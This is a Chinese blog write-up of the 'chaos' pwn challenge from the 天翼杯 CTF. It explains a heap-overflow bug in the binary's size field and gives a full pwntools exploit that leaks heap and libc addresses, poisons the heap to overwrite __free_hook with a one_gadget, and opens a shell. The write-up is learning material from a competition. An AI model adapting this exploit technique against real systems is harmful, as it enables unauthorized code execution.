天翼杯

我是废物!!!!(超大声)

chaos

逆向分析,看exit code来判断哪一步没有通过检测就可以得到正确的菜单选择指令

这个题的漏洞在于如下代码

1
2
3
4
 v4 = qword_202050;
qword_202050 = (__int64)buf;
buf[65] = v4;
*((_DWORD *)buf + 128) = v2;

size位在buf+128的地方,这里就出现大问题了

如果一个堆大小科员覆盖到buf+128的地方并且修改其size那么就可以无限输入了,直接造成堆溢出。

还有个问题在于他的show用的是puts,由于上面的代码我们不难看出是一个类似循环链表,那么当我申请chunk大小为0x208

(buf[65],一个元素大小为8,65*8=0x208)那么show的时候直接就会吐出来在heaparry上的那个堆的地址,同理泄露libc_base

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
from pwn import *
from pwn import p64,u64,p32,u32,p8
#coding=utf-8
context.arch = 'amd64'
#context.log_level = 'debug'

# elf = ELF('./chall')
# libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
# libc = ELF('')

io = process('./chos')
#io = remote("8.134.37.86",28542)
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

def create(size,content):
io.sendlineafter('>>', b'passwd:Cr4at3 \nopcode:1\n')
io.sendlineafter('>>>',str(size))
io.sendafter('>>>',content)

def delete(idx):
io.sendlineafter('>>', b'passwd:D3l4te \nopcode:4\n')
io.sendlineafter('>>>',str(idx))

def edit(idx,content):
io.sendlineafter('>>', b'passwd:Ed1t \nopcode:3\n')
io.sendlineafter('>>>',str(idx))
io.sendafter('>>>',content)

def show(idx):
io.sendlineafter('>>', b'passwd:SH0w \nopcode:2\n')
io.sendlineafter('>>>',str(idx))

def recv(junk):
# io.recvuntil(junk)
# leak = u64(io.recv(6).ljust(8,b'00))
leak = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
info('leak:',hex(leak))
return leak
create(0x108,'\n')
gdb.attach(io)
for i in range(11):
create(0x208,b'a'*0x8)
edit(0,'b'*0x208)
show(0)
io.recvuntil('b'*0x208)
heap_addr = u64(io.recv(6).ljust(8,'\x00'))
print "heap_addr:",hex(heap_addr)

for i in range(9):
delete(0)
#gdb.attach(io)
for i in range(7):
create(0x208,b'a'*0x8)
for i in range(1):
create(0x208,b'a'*0x8)
show(0)
io.recvuntil('a'*0x8)
leak_addr = u64(io.recv(6).ljust(8,'\x00'))
print "leak_addr:",hex(leak_addr)
libc_base = leak_addr - (0x7ffff7dcdeb0-0x7ffff79e2000)
print "libc_base:",hex(libc_base)
free_hook = libc_base + libc.sym['__free_hook']
print "free_hook:",hex(free_hook)
onegadget = [0x4f3d5,0x4f432,0x10a41c]

create(0x208,'a'*8)#2
create(0x208,'a'*8)#1->2
create(0x208,'a'*8)#0->1
delete(2)
create(0x208,'a'*8)#2->0
edit(0,'c'*0x208)
delete(2)
edit(0,'c'*0x208+p64(heap_addr-0x9e0)+p64(0x220)+p64(0x221)+p64(free_hook)+p8(0x73))
gdb.attach(io)
create(0x208,b'\x00')
create(0x208,b'\x00')
edit(0,p64(libc_base+onegadget[1]))

delete(0)

io.interactive()
  • Copyright: Copyright is owned by the author. For commercial reprints, please contact the author for authorization. For non-commercial reprints, please indicate the source.

扫一扫,分享到微信

微信分享二维码
  • Copyrights © 2015-2022 H.greed
  • Visitors: | Views:

请我喝杯咖啡吧~

支付宝
微信